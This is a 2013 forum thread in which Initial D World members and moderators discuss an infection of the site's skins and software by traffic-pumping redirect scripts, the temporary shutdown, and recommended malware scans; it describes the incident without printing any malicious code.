EDIT: Uh, looks like the 'Mark all posts as read' function on IPB default got nuked accidentally! Help!
EDIT 2: Temp link for people like me who rely on it:
https://idforums.net/index.php?act=Login&CODE=05
| Printable Version of Topic
Click here to view this topic in its original format |
| Initial D World - Discussion Board / Forums > Announcement Board > Forum Skins Temporarily Disabled |
| Posted by: Tessou Feb 11 2013, 04:33 PM |
| A few members have alerted me to the presence of infected code in some of the skins available on IDW. While we work on correcting the problem and clean up the problem areas, all skins except for IPB Skin Set 1.2 are disabled for all members (including staff like myself). The menu for selecting skins has been removed from all site pages until further notice. It will not be like this for long. Expect skin selection to come back in less than a week. |
| Posted by: Nomake Wan Feb 11 2013, 05:16 PM |
| Thank you for the heads-up, great work! EDIT: Uh, looks like the 'Mark all posts as read' function on IPB default got nuked accidentally! Help! EDIT 2: Temp link for people like me who rely on it: https://idforums.net/index.php?act=Login&CODE=05 |
| Posted by: Lebon14 Feb 11 2013, 05:46 PM | ||
Oh, okay, I was wondering why. Thanks! |
| Posted by: ThrasherDBS Feb 11 2013, 06:26 PM |
| When everything is fixed, will it remember the skin we had previously, or will we have to go into our control panel and reset it? Thank you for taking the time to correct the issue. |
| Posted by: Nerubian Feb 11 2013, 06:56 PM |
| Does anyone else get virus alerts when clicking on the "View New Posts" link? |
| Posted by: kyonpalm Feb 11 2013, 07:21 PM | ||
How are you even still seeing that? Shouldn't it be gone along with "Mark all posts as read"? |
| Posted by: Nomake Wan Feb 11 2013, 08:14 PM | ||
There shouldn't be virus alerts on that function as--if I recall correctly--it is using pure IPB code to run. The problem only affects non-IPB code. Something may be wrong on your end. Can you take a screenshot of the problem and PM it? |
| Posted by: Rudy Feb 11 2013, 11:15 PM |
| Boy, am I glad I bothered to read before posting. Thanks for the heads up. I miss my minimalist skin ;_; |
| Posted by: THE_HONDA_CG2 Feb 11 2013, 11:52 PM | ||
Yeah, I caught something early this morning when I was making my rounds. It popped up briefly on my screen before it went away. Man it was one hell of a way to wake up! At least it wasn't a creepy picture of a screaming zombie or something. Spoiler'd because it might be a tad NSFW.
|
| Posted by: s12drifter Feb 12 2013, 01:46 AM |
| that looks russian :x but anyway yea i miss my dark gray skin oh how will i go on it life without it!!!! :x this white skin is WAY to bright :x |
| Posted by: kazahana Feb 12 2013, 03:45 AM |
| Got a shock for a moment, and saw this thread. Good work Pear Pear. |
| Posted by: Nomake Wan Feb 12 2013, 03:49 AM | ||
Thank Tessou, not Pear.  |
| Posted by: Btown86 Feb 12 2013, 05:04 AM |
| i knew something looked different this morning when i got on the site, I just couldnt figure it out till i saw this thread. haha |
| Posted by: Tessou Feb 12 2013, 05:13 AM | ||
Unfortunately, the forum will not remember what you were using, so you will have to go and change it back to what you used once we reactivate skins. This is because I turned off skin selection and then forced all members to use the current skin, effectively locking them out of the other selections. This meant that the system considers that all members chose this skin on their own, so when the other skins become available, you will have to choose them to set them as your default instead of what you see right now. |
| Posted by: Nomake Wan Feb 12 2013, 05:15 AM |
| Thanks to Honda_CG2 and SgtXDNX I've found a much more massive problem than initially expected, one that has likely been plaguing the forums for weeks undetected. Either that or it really has just started up again recently...which would be a best-case scenario, to be honest. Either way, please note that the forums are currently infected beyond repair at least until Perry returns from overseas. The only solution is to close the forums entirely as a temporary measure. Tessou, I have PM'd you with the information. In the mean time I'm sick of keeping this quiet. Mods, if I come back and find out my post has been edited then I can be absolutely sure that you're more concerned about covering your asses than you are about security or keeping the member base safe and in he loop. Point is guys, the forum's javascript was infected by an iframe that was forcing browsers to invisibly visit some stupid photography site to boost that site's hits. This would only be triggered when a javascript function was called, such as the smileys in posts or the spell checker in the non-IPB-default skins. Most javascript functions were cleaned by Perry before he left but the spell-checker in the non-IPB-default skins were still infected. I figure this may be because Perry, like me, only uses the default skin and therefore didn't catch the extra javascript file that those skins use. However, now come to find out that the IPB itself appears to be infected. I'm not sure of the vector for this one unfortunately but it doesn't appear to be javascript-based. It's embedded in all transfer functions--making posts, editing posts, logging in, changing your avatar, etc. It's a redirect script on a massive scale, redirecting to various websites in Russia. On top of that those redirects include your authorization key since that key is sent in plaintext via the URL. While the pass_hash function is indeed part of this interaction I do not believe it is actually transmitted as that function loads well before the infected code runs. The infected code itself appears to be an IPB-specific version of the very same traffic-pumping infection that had been in the Javascript, albeit to a site in Russia instead of a photography site. I've already pored over the source code for the forum pages that lead to the affected redirects and the source stylesheets and javascript functions are all clean. That means only one thing: IPB itself is what's infected. The forums must be shut down temporarily. See you when this is resolved, all. I'm out. |
| Posted by: Tessou Feb 12 2013, 05:20 AM |
| This is something that the mod team did not detect, and we weren't keeping anything hush-hush, so there's no worries as to having anything redacted. You and many other members have done a fantastic job letting us know what's going on, especially considering that the mod team itself has not reported any problems on the site, aside from Honda in this thread. The staff section has been quiet for weeks. This is a serious matter, and I am heavily considering your suggestion of shutting the site down as a safety measure until we can hammer out this infection. |
| Posted by: Spaz Feb 12 2013, 05:37 AM |
| That's... unfortunate. But then again, it's something that comes with the territory when using software this old. I hadn't noticed anything myself. |
| Posted by: RedsunsF1 Feb 12 2013, 07:13 AM |
 Thought my account got deleted for a second haha  Thanks for the heads up |
| Posted by: Nomake Wan Feb 12 2013, 05:23 PM | ||
Now that we're back allow me to formally apologize if it seemed I was 'attacking' you or the way you run the site. This was not the case--I don't believe you and I have ever discussed the situations that have affected the site's code and so it was actually what I had been told by other moderating team members during the first incident that I was rallying against. Generally I got the idea that security issues were to be kept 'hush-hush', but this one was so huge that I just felt I couldn't stay quiet about it. Again, my apologies... and welcome back, IDW!  |
| Posted by: HorizontalMitsubishi Feb 12 2013, 07:29 PM |
| If you need help cleaning up the site, I've been doing more and more of that lately, I had two VB based forums get hit and a wordpress site get hit. |
| Posted by: Nomake Wan Feb 12 2013, 08:01 PM | ||
It looks like we're all good now and thankfully it wasn't actually the forum software that was vulnerable. So easy it could be done from China! |
| Posted by: Tessou Feb 13 2013, 08:53 AM | ||
I never read it that way, so it's all good. No worries. |
| Posted by: Möbius Feb 13 2013, 09:06 AM |
| Just got back, my skin is as set before, thanks for the heads up a couple pages up, Don. |
| Posted by: Nerubian Feb 13 2013, 10:04 AM | ||
Virus alert don't appear anymore, now. |
| Posted by: RedsunsF1 Feb 13 2013, 10:06 AM |
| I had to re-select the skin again but that's not a problem. Glad it's all working again. |
| Posted by: Nomake Wan Feb 13 2013, 10:19 AM | ||
Well yeah, but it's...nah, never mind. We're back so I'm gonna make an announcement post. EDIT: Scratch that I can't. Anyway, the gist of it is that while IDW was affected by some unscrupulous individuals sending traffic to other countries there's a chance that all members on Windows PCs have been affected by some payload or another. The actual problem itself was non-malicious--that is, it did not drop payload, it simply pumped traffic to certain websites. However, those websites themselves may have carried malware payload. As such I am recommending that all members with Windows PCs who browsed the forum from February 9th until now run a malware scanner on their machine(s). A quick scan with Malwarebytes Anti-Malware should suffice to let you know if you have nasties on your machine or not. If you do, run a full scan afterward to make sure you nailed it. If you don't want to install something, Panda Antivirus has a good online scanner on their website. There's also Sophos's offline scanner for really nasty bugs (like rootkits) but on top of the fact that I don't think any rootkits were involved with this incident that scanner has no user-selectable options and will cause problems afterward if used. It's kind of like using a nuclear bomb to kill a cockroach. Sure it'll work but the collateral damage will make you wonder if you did the right thing. Those of you on Mac OSX, Linux or a mobile device would not have been affected. |
| Posted by: Spaz Feb 14 2013, 09:12 PM |
Not sure if this is due to a recent database update where info was collected pre-codefix, or if it's new, but here you go: Image size reduced, original size: 1360 x 728. http://i40.photobucket.com/albums/e230/cmspaz/idwinfection_zps97357378.png to view the image in its original dimension. |
| Posted by: Nomake Wan Feb 14 2013, 10:12 PM | ||
It says that it was collected 2/14, which would be today. However that's the main drop website and not the forums so I have no say in the matter. I haven't visited go2id in over half a decade.  It's entirely possible that something's on go2id though. IDW and WME appear to be clean but I'm not sure if go2id was actually checked. |
| Posted by: Spaz Feb 15 2013, 05:31 AM | ||
The red banner stays on idforums.net, but goes away once you get deeper. |
| Posted by: Nomake Wan Feb 15 2013, 07:05 AM | ||
I haven't found any malicious content on the forums themselves so I'm not sure why it would. What happens if you go to the forums (with the red banner showing) then press CTRL+F5? Does the banner go away? |
| Posted by: Spaz Feb 15 2013, 10:53 AM | ||
I can check when I get home from work. Comps are preloaded with IE and we can't install anything.  |
| Posted by: Spaz Feb 15 2013, 03:16 PM | ||
Banner stays. However, if I go directly to the forum, not via the go2id gateway page, the banner does not appear. |
| Posted by: kyonpalm Feb 15 2013, 03:19 PM | ||
Sounds to me like there's a bit of code on the main site that still loads extra links invisibly. If I'm not mistaken, whenever you loaded a page on the forums when they were infected, it would also invisibly load this photography website (or maybe it was the Russian one...) Maybe that's what's happening, except on the main site instead of the forums which are clean. That would explain why loading the forums directly instead of using the portal on the main site solves the problem. |
| Posted by: Nomake Wan Feb 15 2013, 04:36 PM | ||
The photography one was only in certain functions--it wasn't built into the forum bits. The Russian one was built into the forum bits. I'll check out go2id with my packet sniffer and see what comes up. Thanks for the report, Spaz. EDIT: go2id.net is very much being affected by the very same attack that had been leveraged on the forums' functions. As of now Go2ID is not a valid site but as far as I know there's no way to shut down access to it at this time since it is not actually connected to the forums in any way. All I can say is, stop using Go2ID. The forums themselves are perfectly clean. |
| Posted by: Spaz Feb 15 2013, 05:39 PM |
| You're very welcome. Just passing along what I find. |
| Posted by: kyonpalm Feb 15 2013, 05:46 PM | ||
Exactly as I predicted. |
| Posted by: THE_HONDA_CG2 Feb 18 2013, 08:49 PM |
So uh guys. I don't know what this means but I think I should bring this to your attention. I've never gotten anything like this before so um... Yeah. What do you make of it? Image size reduced, original size: 900 x 506. http://i.minus.com/jw5TWBLF2TPUk.png to view the image in its original dimension. |
| Posted by: Nomake Wan Feb 19 2013, 12:00 AM | ||
How did you get that? Did you use go2id.net before entering the forums? |
| Posted by: THE_HONDA_CG2 Feb 19 2013, 12:07 AM |
| I tried checking this thread through this link: https://idforums.net/index.php?showtopic=45369 and that is where I got the warning. Its the AE86 plush doll~ thread. |
| Posted by: Nomake Wan Feb 19 2013, 12:24 AM | ||
As reported in IRC, the n00b posting in that thread stole his avatar from go2id directly. This is where the warning comes from. Also, the guy is an idiot who not only stole the image but didn't bother to resize it properly or host it on an actual image host. Buckets full of fail. Buckets full of fail everywhere. |
| Posted by: Tessou Feb 19 2013, 08:02 AM |
| So... what to do? I'm at the ready to get stuff done. Edit: nvm, it appears from board logs that Honda already removed the guy's avatar. That leak is plugged, at least. |
| Posted by: Nomake Wan Feb 19 2013, 08:48 AM |
| It's unfortunate that there's no way to set up a forum-level block of the go2id domain temporarily. I wouldn't even know how to begin doing that and with what little experience I have messing with IPB I don't think there's a forum-level way to do that. Pretty sure it would only be possible at the VPS. If we had access to that, though, we could just fix go2id instead.  |
| Posted by: THE_HONDA_CG2 Feb 19 2013, 08:50 AM | ||
Yeah Boss, N1 told me in the IRC to go in and take out his avatar. It was a clean job. That was quite an adventure to say the least. I'll keep an eye out of things like this in the future too. [ Post made via Mobile Device ] |
| Posted by: Tessou Feb 19 2013, 12:55 PM |
| You're all doing a great job of keeping the rest of us informed. A few of us, myself included, are not seeing these errors or malware alerts in any shape or form. |
| Posted by: HorizontalMitsubishi Feb 19 2013, 03:36 PM | ||
| I'm not seeing any alert on idforums.net but go2id.net is still throwing errors in Google, Firefox and Chrome. So after taking literally a 30 second look at go2id.net here is what I found.
But as I've said, if you need help with the clean up, you know where to find me. |
| Posted by: Nomake Wan Feb 19 2013, 03:56 PM |
| idforums.net was only showing an alert for the thread Honda mentioned because a user in that thread was stealing his avatar from go2id.net, which has the alert. The infection vector, content and disinfection method have been known this whole time--as you displayed those are the very same infections that had been on idforums.net in the past. As such ridding the domain of those problems is not a matter of expertise but rather one of access. Perry is the only person who can do it because he's the only one with access to those files to make changes. Perry isn't here. As soon as he's back he can fix the whole domain in one swoop in all of five seconds, just as he did with idforums.net. |
